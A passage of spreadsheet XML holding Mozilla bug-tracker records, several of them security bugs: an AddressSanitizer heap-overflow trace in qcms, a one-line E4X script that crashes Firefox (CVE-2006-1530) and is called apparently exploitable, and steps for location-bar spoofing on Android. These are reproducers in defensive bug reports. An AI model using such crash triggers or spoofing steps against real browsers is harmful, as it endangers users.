      <c r="K2574" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2574" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2574" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N2574" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2574" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2574" t="inlineStr"/>
      <c r="Q2574" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2574" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2574" t="inlineStr">
        <is>
          <t>mozilla1.4final</t>
        </is>
      </c>
      <c r="T2574" t="n">
        <v>1</v>
      </c>
      <c r="U2574" t="n">
        <v>0</v>
      </c>
      <c r="V2574" t="n">
        <v>19</v>
      </c>
      <c r="W2574" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.3) Gecko/20030322
Build Identifier: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.3) Gecko/20030322
In any web page referencing a "file://" location, such as:
  &lt;img src="file:///silly.nonexistant.image.jpg"&gt;
  &lt;td background="file:///silly.nonexistant.image.jpg"&gt;
Mozilla freezes while trying to save the complete web page (unless the
referenced file actually exists).  It appears that the failure occurs when it's
trying to get the referenced file.
Reproducible: Always
Steps to Reproduce:
1. Load the test case.
2. Ensure you don't have a valid file "image.jpg" at your file system root.
3. File-&gt;Save Page As... as a "Web page, complete".
Actual Results:  
Mozilla appears to freeze.  A "kill" on its process had no effect; a "kill -9"
was needed to close it to try to restart.  It appears that Mozilla _did_ write
an incomplete Download Manager entry before freezing.
Expected Results:  
It shouldn't freeze.  It may generate an empty file, or simply leave the
reference untouched in the saved page (preferred).
The theme used makes no difference.
libc 2.3.1
Linux 2.4.20</t>
        </is>
      </c>
      <c r="X2574" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2575">
      <c r="A2575" t="n">
        <v>1126920</v>
      </c>
      <c r="B2575" t="inlineStr">
        <is>
          <t>2015-01-28 10:08:04 -0800</t>
        </is>
      </c>
      <c r="C2575" t="inlineStr">
        <is>
          <t>Update test.sh to use 'heads' instead of upgrade +1</t>
        </is>
      </c>
      <c r="D2575" t="inlineStr">
        <is>
          <t>2015-01-28 13:41:37 -0800</t>
        </is>
      </c>
      <c r="E2575" t="n">
        <v>1</v>
      </c>
      <c r="F2575" t="n">
        <v>1</v>
      </c>
      <c r="G2575" t="n">
        <v>4</v>
      </c>
      <c r="H2575" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I2575" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J2575" t="inlineStr">
        <is>
          <t>Backend</t>
        </is>
      </c>
      <c r="K2575" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2575" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2575" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2575" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2575" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2575" t="inlineStr"/>
      <c r="Q2575" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2575" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2575" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2575" t="n">
        <v>1</v>
      </c>
      <c r="U2575" t="n">
        <v>0</v>
      </c>
      <c r="V2575" t="n">
        <v>3</v>
      </c>
      <c r="W2575" t="inlineStr">
        <is>
          <t>New version of alembic allows for multiple revisions to have the same previous revision, allowing for clean merging without rebasing if two people have a migration that is merged around the same time. 
This means that we won't have to edit the downrevision anymore and will still be able to upgrade.
The caveat is that we need to use 'upgrade heads' instead of "+1" in the tests.</t>
        </is>
      </c>
      <c r="X2575" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2576">
      <c r="A2576" t="n">
        <v>1028358</v>
      </c>
      <c r="B2576" t="inlineStr">
        <is>
          <t>2014-06-20 12:23:15 -0700</t>
        </is>
      </c>
      <c r="C2576" t="inlineStr">
        <is>
          <t>We are not firing any post-barriers on Heap&lt;T&gt; for JSFunction*</t>
        </is>
      </c>
      <c r="D2576" t="inlineStr">
        <is>
          <t>2016-06-04 16:02:23 -0700</t>
        </is>
      </c>
      <c r="E2576" t="n">
        <v>1</v>
      </c>
      <c r="F2576" t="n">
        <v>1</v>
      </c>
      <c r="G2576" t="n">
        <v>3</v>
      </c>
      <c r="H2576" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2576" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2576" t="inlineStr">
        <is>
          <t>JavaScript: GC</t>
        </is>
      </c>
      <c r="K2576" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2576" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2576" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2576" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2576" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2576" t="inlineStr">
        <is>
          <t>[qa-][adv-main31+]</t>
        </is>
      </c>
      <c r="Q2576" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2576" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S2576" t="inlineStr">
        <is>
          <t>mozilla33</t>
        </is>
      </c>
      <c r="T2576" t="n">
        <v>1</v>
      </c>
      <c r="U2576" t="n">
        <v>0</v>
      </c>
      <c r="V2576" t="n">
        <v>18</v>
      </c>
      <c r="W2576" t="inlineStr">
        <is>
          <t>JSFunction is a sub-class of JSObject, but gecko users of RootingAPI.h have no way of knowing this. The upshot is that we end up using GCMethods&lt;JSFunction*&gt;::needsPostBarrier (which returns false unconditionally), instead of GCMethods&lt;JSObject*&gt;::needsPostBarrier. We absolutely allocate some JSFUnction in the nursery, so I guess we're just getting mostly lucky right now.
Luckily, this is only a problem for Heap&lt;T&gt;: the internal barrier classes use InternalGCMethods&lt;T&gt;, which dispatches to T::needsPostBarrier, which will follow the class hierarchy and always find JSObject::needsPostBarrier.
The trivial fix is to dup GCMethods&lt;JSObject*&gt; for JSFunction*. If there were other gecko-exposed object users of GCMethods&lt;T&gt;, they would have to be in SpecificRootKind too, so we can be fairly confident that JSFunction is the only subclass we need to worry about.
Will patch after lunch.</t>
        </is>
      </c>
      <c r="X2576" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2577">
      <c r="A2577" t="n">
        <v>969226</v>
      </c>
      <c r="B2577" t="inlineStr">
        <is>
          <t>2014-02-06 19:40:01 -0800</t>
        </is>
      </c>
      <c r="C2577" t="inlineStr">
        <is>
          <t>Heap-buffer-overflow in read_u32</t>
        </is>
      </c>
      <c r="D2577" t="inlineStr">
        <is>
          <t>2024-05-30 08:32:46 -0700</t>
        </is>
      </c>
      <c r="E2577" t="n">
        <v>1</v>
      </c>
      <c r="F2577" t="n">
        <v>1</v>
      </c>
      <c r="G2577" t="n">
        <v>3</v>
      </c>
      <c r="H2577" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2577" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2577" t="inlineStr">
        <is>
          <t>Graphics</t>
        </is>
      </c>
      <c r="K2577" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2577" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M2577" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2577" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2577" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2577" t="inlineStr">
        <is>
          <t>[adv-main29+][adv-esr24.5+]</t>
        </is>
      </c>
      <c r="Q2577" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2577" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2577" t="inlineStr">
        <is>
          <t>mozilla31</t>
        </is>
      </c>
      <c r="T2577" t="n">
        <v>1</v>
      </c>
      <c r="U2577" t="n">
        <v>0</v>
      </c>
      <c r="V2577" t="n">
        <v>27</v>
      </c>
      <c r="W2577" t="inlineStr">
        <is>
          <t>To reproduce, visit http://www.forumsfamilie.de/index.php
==7222==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200036d473 at pc 0x7fd89ea02b83 bp 0x7fd84df71950 sp 0x7fd84df71948
READ of size 4 at 0x60200036d473 thread T63 (ImageDecoder #2)
    #0 0x7fd89ea02b82 in read_u32 gfx/qcms/iccread.c:100
    #1 0x7fd89e9fe76a in qcms_profile_from_memory gfx/qcms/iccread.c:1023
    #2 0x7fd889bf8d4f in mozilla::image::GetICCProfile(jpeg_decompress_struct&amp;) image/decoders/nsJPEGDecoder.cpp:68
    #3 0x7fd889bf4d44 in mozilla::image::nsJPEGDecoder::WriteInternal(char const*, unsigned int, mozilla::image::DecodeStrategy) image/decoders/nsJPEGDecoder.cpp:258
    #4 0x7fd889b0ab64 in mozilla::image::Decoder::Write(char const*, unsigned int, mozilla::image::DecodeStrategy) image/src/Decoder.cpp:107
    #5 0x7fd889ab904b in mozilla::image::RasterImage::WriteToDecoder(char const*, unsigned int, mozilla::image::DecodeStrategy) image/src/RasterImage.cpp:2148
    #6 0x7fd889acb74a in mozilla::image::RasterImage::DecodeSomeData(unsigned int, mozilla::image::DecodeStrategy) image/src/RasterImage.cpp:2779
    #7 0x7fd889adadb9 in mozilla::image::RasterImage::DecodePool::DecodeSomeOfImage(mozilla::image::RasterImage*, mozilla::image::DecodeStrategy, mozilla::image::RasterImage::DecodePool::DecodeType, unsigned int) image/src/RasterImage.cpp:3419
    #8 0x7fd889adc477 in mozilla::image::RasterImage::DecodePool::DecodeJob::Run() image/src/RasterImage.cpp:3285
    #9 0x7fd883c91475 in nsThreadPool::Run() xpcom/threads/nsThreadPool.cpp:208
    #10 0x7fd883c91fd4 in non-virtual thunk to nsThreadPool::Run() objdir-ff-asan-sym/xpcom/threads/Unified_cpp_xpcom_threads0.cpp:222
    #11 0x7fd883c7d718 in nsThread::ProcessNextEvent(bool, bool*) xpcom/threads/nsThread.cpp:643
    #12 0x7fd88368f442 in NS_ProcessNextEvent(nsIThread*, bool) xpcom/glue/nsThreadUtils.cpp:263
    #13 0x7fd885ebeb0d in mozilla::ipc::MessagePumpForNonMainThreads::Run(base::MessagePump::Delegate*) ipc/glue/MessagePump.cpp:303
    #14 0x7fd885b823b7 in MessageLoop::RunInternal() ipc/chromium/src/base/message_loop.cc:226
    #15 0x7fd885b8200a in MessageLoop::RunHandler() ipc/chromium/src/base/message_loop.cc:219
    #16 0x7fd885b81ee5 in MessageLoop::Run() ipc/chromium/src/base/message_loop.cc:193
    #17 0x7fd883c731ec in nsThread::ThreadFunc(void*) xpcom/threads/nsThread.cpp:258
    #18 0x7fd8aadb3242 in _pt_root nsprpub/pr/src/pthreads/ptthread.c:205
    #19 0x43c240 in __asan::AsanThread::ThreadStart(unsigned long) _asan_rtl_
    #20 0x7fd8af67fe99 in start_thread /build/buildd/eglibc-2.15/nptl/pthread_create.c:308
    #21 0x7fd8ae78e3fc in
0x60200036d473 is located 2 bytes to the right of 1-byte region [0x60200036d470,0x60200036d471)
allocated by thread T63 (ImageDecoder #2) here:
    #0 0x434065 in malloc _asan_rtl_
    #1 0x7fd889bd819c in read_icc_profile image/decoders/iccjpeg.c:163
    #2 0x7fd889bf8cbf in mozilla::image::GetICCProfile(jpeg_decompress_struct&amp;) image/decoders/nsJPEGDecoder.cpp:67
    #3 0x7fd889bf4d44 in mozilla::image::nsJPEGDecoder::WriteInternal(char const*, unsigned int, mozilla::image::DecodeStrategy) image/decoders/nsJPEGDecoder.cpp:258
    #4 0x7fd889b0ab64 in mozilla::image::Decoder::Write(char const*, unsigned int, mozilla::image::DecodeStrategy) image/src/Decoder.cpp:107
    #5 0x7fd889ab904b in mozilla::image::RasterImage::WriteToDecoder(char const*, unsigned int, mozilla::image::DecodeStrategy) image/src/RasterImage.cpp:2148
    #6 0x7fd889acb74a in mozilla::image::RasterImage::DecodeSomeData(unsigned int, mozilla::image::DecodeStrategy) image/src/RasterImage.cpp:2779
    #7 0x7fd889adadb9 in mozilla::image::RasterImage::DecodePool::DecodeSomeOfImage(mozilla::image::RasterImage*, mozilla::image::DecodeStrategy, mozilla::image::RasterImage::DecodePool::DecodeType, unsigned int) image/src/RasterImage.cpp:3419
    #8 0x7fd889adc477 in mozilla::image::RasterImage::DecodePool::DecodeJob::Run() image/src/RasterImage.cpp:3285
    #9 0x7fd883c91475 in nsThreadPool::Run() xpcom/threads/nsThreadPool.cpp:208
    #10 0x7fd883c91fd4 in non-virtual thunk to nsThreadPool::Run() objdir-ff-asan-sym/xpcom/threads/Unified_cpp_xpcom_threads0.cpp:222
    #11 0x7fd883c7d718 in nsThread::ProcessNextEvent(bool, bool*) xpcom/threads/nsThread.cpp:643
    #12 0x7fd88368f442 in NS_ProcessNextEvent(nsIThread*, bool) xpcom/glue/nsThreadUtils.cpp:263
    #13 0x7fd885ebeb0d in mozilla::ipc::MessagePumpForNonMainThreads::Run(base::MessagePump::Delegate*) ipc/glue/MessagePump.cpp:303
    #14 0x7fd885b823b7 in MessageLoop::RunInternal() ipc/chromium/src/base/message_loop.cc:226
    #15 0x7fd885b8200a in MessageLoop::RunHandler() ipc/chromium/src/base/message_loop.cc:219
    #16 0x7fd885b81ee5 in MessageLoop::Run() ipc/chromium/src/base/message_loop.cc:193
    #17 0x7fd883c731ec in nsThread::ThreadFunc(void*) xpcom/threads/nsThread.cpp:258
    #18 0x7fd8aadb3242 in _pt_root nsprpub/pr/src/pthreads/ptthread.c:205
    #19 0x43c240 in __asan::AsanThread::ThreadStart(unsigned long) _asan_rtl_
Thread T63 (ImageDecoder #2) created by T0 here:
    #0 0x414f7e in __interceptor_pthread_create _asan_rtl_
    #1 0x7fd8aada4894 in _PR_CreateThread nsprpub/pr/src/pthreads/ptthread.c:445
    #2 0x7fd8aada2c6a in PR_CreateThread nsprpub/pr/src/pthreads/ptthread.c:528
    #3 0x7fd883c76951 in nsThread::Init() xpcom/threads/nsThread.cpp:329
    #4 0x7fd883c8995e in nsThreadManager::NewThread(unsigned int, unsigned int, nsIThread**) xpcom/threads/nsThreadManager.cpp:232
    #5 0x7fd883c8ea5f in nsThreadPool::PutEvent(nsIRunnable*) xpcom/threads/nsThreadPool.cpp:92
    #6 0x7fd883c92858 in nsThreadPool::Dispatch(nsIRunnable*, unsigned int) xpcom/threads/nsThreadPool.cpp:246
    #7 0x7fd883b86456 in nsInputStreamReadyEvent::OnInputStreamReady(nsIAsyncInputStream*) xpcom/io/nsStreamUtils.cpp:72
    #8 0x7fd883b8679e in non-virtual thunk to nsInputStreamReadyEvent::OnInputStreamReady(nsIAsyncInputStream*) objdir-ff-asan-sym/xpcom/io/Unified_cpp_xpcom_io1.cpp:79
    #9 0x7fd883b07456 in nsPipeEvents::~nsPipeEvents() xpcom/io/nsPipe3.cpp:592
    #10 0x7fd883b0fdf1 in nsPipeInputStream::AsyncWait(nsIInputStreamCallback*, unsigned int, unsigned int, nsIEventTarget*) xpcom/io/nsPipe3.cpp:854
    #11 0x7fd8842a78ae in nsInputStreamPump::EnsureWaiting() netwerk/base/src/nsInputStreamPump.cpp:142
    #12 0x7fd8842afde1 in nsInputStreamPump::OnInputStreamReady(nsIAsyncInputStream*) netwerk/base/src/nsInputStreamPump.cpp:475
    #13 0x7fd8842b37ae in non-virtual thunk to nsInputStreamPump::OnInputStreamReady(nsIAsyncInputStream*) objdir-ff-asan-sym/netwerk/base/src/Unified_cpp_netwerk_base_src1.cpp:490
    #14 0x7fd883b861a8 in nsInputStreamReadyEvent::Run() xpcom/io/nsStreamUtils.cpp:85
    #15 0x7fd883c7d718 in nsThread::ProcessNextEvent(bool, bool*) xpcom/threads/nsThread.cpp:643
    #16 0x7fd88368f442 in NS_ProcessNextEvent(nsIThread*, bool) xpcom/glue/nsThreadUtils.cpp:263
    #17 0x7fd885eba818 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) ipc/glue/MessagePump.cpp:95
    #18 0x7fd885b823b7 in MessageLoop::RunInternal() ipc/chromium/src/base/message_loop.cc:226
    #19 0x7fd885b8200a in MessageLoop::RunHandler() ipc/chromium/src/base/message_loop.cc:219
    #20 0x7fd885b81ee5 in MessageLoop::Run() ipc/chromium/src/base/message_loop.cc:193
    #21 0x7fd88ea2463f in nsBaseAppShell::Run() widget/xpwidgets/nsBaseAppShell.cpp:161
    #22 0x7fd8992b6319 in nsAppStartup::Run() toolkit/components/startup/nsAppStartup.cpp:276
    #23 0x7fd898af4c65 in XREMain::XRE_mainRun() toolkit/xre/nsAppRunner.cpp:4090
    #24 0x7fd898af950a in XREMain::XRE_main(int, char**, nsXREAppData const*) toolkit/xre/nsAppRunner.cpp:4158
    #25 0x7fd898afbed4 in XRE_main toolkit/xre/nsAppRunner.cpp:4368
    #26 0x44dc07 in do_main(int, char**, nsIFile*) browser/app/nsBrowserApp.cpp:280
    #27 0x44abe5 in main browser/app/nsBrowserApp.cpp:648
    #28 0x7fd8ae6bb76c in __libc_start_main /build/buildd/eglibc-2.15/csu/libc-start.c:226
Shadow bytes around the buggy address:
  0x0c0480065a30: fa fa fd fd fa fa fd fa fa fa 00 00 fa fa 00 fa
  0x0c0480065a40: fa fa 00 00 fa fa fd fa fa fa 00 00 fa fa 00 fa
  0x0c0480065a50: fa fa 00 00 fa fa fd fa fa fa 00 00 fa fa 00 fa
  0x0c0480065a60: fa fa 00 00 fa fa fd fd fa fa fd fa fa fa 00 00
  0x0c0480065a70: fa fa 00 00 fa fa 00 fa fa fa 00 00 fa fa 00 fa
=&gt;0x0c0480065a80: fa fa 00 00 fa fa 00 fa fa fa 00 00 fa fa[01]fa
  0x0c0480065a90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c0480065aa0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c0480065ab0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c0480065ac0: fa fa fd fa fa fa 00 02 fa fa 00 00 fa fa 00 fa
  0x0c0480065ad0: fa fa fd fa fa fa 00 00 fa fa 00 04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7222==ABORTING</t>
        </is>
      </c>
      <c r="X2577" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2578">
      <c r="A2578" t="n">
        <v>326615</v>
      </c>
      <c r="B2578" t="inlineStr">
        <is>
          <t>2006-02-09 20:20:15 -0800</t>
        </is>
      </c>
      <c r="C2578" t="inlineStr">
        <is>
          <t>CVE-2006-1530 compareDocumentPosition with E4X crashes [@ XPCWrappedNativeScope::SystemIsBeingShutDown]</t>
        </is>
      </c>
      <c r="D2578" t="inlineStr">
        <is>
          <t>2007-12-23 16:46:22 -0800</t>
        </is>
      </c>
      <c r="E2578" t="n">
        <v>1</v>
      </c>
      <c r="F2578" t="n">
        <v>1</v>
      </c>
      <c r="G2578" t="n">
        <v>3</v>
      </c>
      <c r="H2578" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2578" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2578" t="inlineStr">
        <is>
          <t>XPConnect</t>
        </is>
      </c>
      <c r="K2578" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2578" t="inlineStr">
        <is>
          <t>PowerPC</t>
        </is>
      </c>
      <c r="M2578" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N2578" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2578" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2578" t="inlineStr">
        <is>
          <t>[sg:critical] based on stack in comment 2 [rft-dl]</t>
        </is>
      </c>
      <c r="Q2578" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2578" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2578" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2578" t="n">
        <v>1</v>
      </c>
      <c r="U2578" t="n">
        <v>0</v>
      </c>
      <c r="V2578" t="n">
        <v>38</v>
      </c>
      <c r="W2578" t="inlineStr">
        <is>
          <t>This crashes Firefox (tested with today's trunk on Mac)
&lt;body&gt;&lt;script&gt;document.body.compareDocumentPosition(&lt;foo/&gt;);&lt;/script&gt;&lt;/body&gt;
The crash appears to be exploitable, so I'm making this a security-sensitive bug.</t>
        </is>
      </c>
      <c r="X2578" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2579">
      <c r="A2579" t="n">
        <v>1443052</v>
      </c>
      <c r="B2579" t="inlineStr">
        <is>
          <t>2018-03-04 18:46:30 -0800</t>
        </is>
      </c>
      <c r="C2579" t="inlineStr">
        <is>
          <t>Force TopTabs in LTR</t>
        </is>
      </c>
      <c r="D2579" t="inlineStr">
        <is>
          <t>2018-03-09 05:18:08 -0800</t>
        </is>
      </c>
      <c r="E2579" t="n">
        <v>1</v>
      </c>
      <c r="F2579" t="n">
        <v>1</v>
      </c>
      <c r="G2579" t="n">
        <v>2</v>
      </c>
      <c r="H2579" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I2579" t="inlineStr">
        <is>
          <t>Firefox for iOS</t>
        </is>
      </c>
      <c r="J2579" t="inlineStr">
        <is>
          <t>Localization</t>
        </is>
      </c>
      <c r="K2579" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2579" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M2579" t="inlineStr">
        <is>
          <t>iOS</t>
        </is>
      </c>
      <c r="N2579" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2579" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2579" t="inlineStr"/>
      <c r="Q2579" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2579" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2579" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2579" t="n">
        <v>1</v>
      </c>
      <c r="U2579" t="n">
        <v>0</v>
      </c>
      <c r="V2579" t="n">
        <v>4</v>
      </c>
      <c r="W2579" t="inlineStr">
        <is>
          <t>Temporary patch to force TopTabs in LTR until we have a good patch in place to deal with RTL.
If we cannot properly support RTL in TopTabs then we can ship with this temporary and update in a point release. Without this patch TopTabs are unusable in RTL mode.</t>
        </is>
      </c>
      <c r="X2579" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2580">
      <c r="A2580" t="n">
        <v>497217</v>
      </c>
      <c r="B2580" t="inlineStr">
        <is>
          <t>2009-06-09 15:32:42 -0700</t>
        </is>
      </c>
      <c r="C2580" t="inlineStr">
        <is>
          <t>The first random value ever generated by the RNG should be discarded</t>
        </is>
      </c>
      <c r="D2580" t="inlineStr">
        <is>
          <t>2009-06-10 11:12:45 -0700</t>
        </is>
      </c>
      <c r="E2580" t="n">
        <v>1</v>
      </c>
      <c r="F2580" t="n">
        <v>1</v>
      </c>
      <c r="G2580" t="n">
        <v>3</v>
      </c>
      <c r="H2580" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2580" t="inlineStr">
        <is>
          <t>NSS</t>
        </is>
      </c>
      <c r="J2580" t="inlineStr">
        <is>
          <t>Libraries</t>
        </is>
      </c>
      <c r="K2580" t="inlineStr">
        <is>
          <t>3.12.4</t>
        </is>
      </c>
      <c r="L2580" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2580" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2580" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2580" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2580" t="inlineStr">
        <is>
          <t>FIPS [Awaiting Softoken's Thaw]</t>
        </is>
      </c>
      <c r="Q2580" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2580" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2580" t="inlineStr">
        <is>
          <t>3.12.4</t>
        </is>
      </c>
      <c r="T2580" t="n">
        <v>1</v>
      </c>
      <c r="U2580" t="n">
        <v>0</v>
      </c>
      <c r="V2580" t="n">
        <v>13</v>
      </c>
      <c r="W2580" t="inlineStr">
        <is>
          <t>FIPs requires that first output of the rng be discarded and kept for the continuous prng test.</t>
        </is>
      </c>
      <c r="X2580" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2581">
      <c r="A2581" t="n">
        <v>1317242</v>
      </c>
      <c r="B2581" t="inlineStr">
        <is>
          <t>2016-11-14 00:57:52 -0800</t>
        </is>
      </c>
      <c r="C2581" t="inlineStr">
        <is>
          <t>Location Bar Spoofing Risk using the Fullscreen mode and a new tab loaded using the alert()</t>
        </is>
      </c>
      <c r="D2581" t="inlineStr">
        <is>
          <t>2024-05-30 09:23:00 -0700</t>
        </is>
      </c>
      <c r="E2581" t="n">
        <v>1</v>
      </c>
      <c r="F2581" t="n">
        <v>1</v>
      </c>
      <c r="G2581" t="n">
        <v>6</v>
      </c>
      <c r="H2581" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I2581" t="inlineStr">
        <is>
          <t>Firefox for Android Graveyard</t>
        </is>
      </c>
      <c r="J2581" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K2581" t="inlineStr">
        <is>
          <t>49 Branch</t>
        </is>
      </c>
      <c r="L2581" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2581" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2581" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2581" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2581" t="inlineStr">
        <is>
          <t>fixed by bug 1319366</t>
        </is>
      </c>
      <c r="Q2581" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2581" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2581" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2581" t="n">
        <v>1</v>
      </c>
      <c r="U2581" t="n">
        <v>0</v>
      </c>
      <c r="V2581" t="n">
        <v>16</v>
      </c>
      <c r="W2581" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:49.0) Gecko/20100101 Firefox/49.0
Build ID: 20161019084923
Steps to reproduce:
Steps to reproduce:
When you go on the fullscreen mode and you load after a new tab with the alert(); , the location bar has disappeared.
1 : Go on http://www.alternativ-testing.fr/Research/Mozilla/android/-K8H4D0-Location_Bar_Spoofing-FullScreen-and-alert-JavaScript-Function/TESTCASE1.HTML and click on the first link (this will activated Fullscreen Mode).
2 : Click on the second link , a new tab will be openned which contains a webpage which load the JavaScript alert(); Function.
Actual results:
Actual results:
Now the location bar is invisible (even if you try to press the back button on android , the location bar has disappeared for always)
you ca use now a fake location bar (leading to a Location Bar Spoofing)
Expected results:
After all these steps, you can use a fake location bar (leading to a Location Bar Spoofing).</t>
        </is>
      </c>
      <c r="X2581" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2582">
      <c r="A2582" t="n">
        <v>1221620</v>
      </c>
      <c r="B2582" t="inlineStr">
        <is>
          <t>2015-11-04 09:03:54 -0800</t>
        </is>
      </c>
      <c r="C2582" t="inlineStr">
        <is>
          <t>UBSan: left shift of negative value in DER_GetInteger_Util</t>
        </is>
      </c>
      <c r="D2582" t="inlineStr">
        <is>
          <t>2017-01-05 09:08:20 -0800</t>
        </is>
      </c>
      <c r="E2582" t="n">
        <v>1</v>
      </c>
      <c r="F2582" t="n">
        <v>1</v>
      </c>
      <c r="G2582" t="n">
        <v>3</v>
      </c>
      <c r="H2582" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2582" t="inlineStr">
        <is>
          <t>NSS</t>
        </is>
      </c>
      <c r="J2582" t="inlineStr">
        <is>
          <t>Libraries</t>
        </is>
      </c>
      <c r="K2582" t="inlineStr">
        <is>
          <t>trunk</t>
        </is>
      </c>
      <c r="L2582" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2582" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2582" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2582" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2582" t="inlineStr">
        <is>
          <t>[adv-main47+]</t>
        </is>
      </c>
      <c r="Q2582" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2582" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
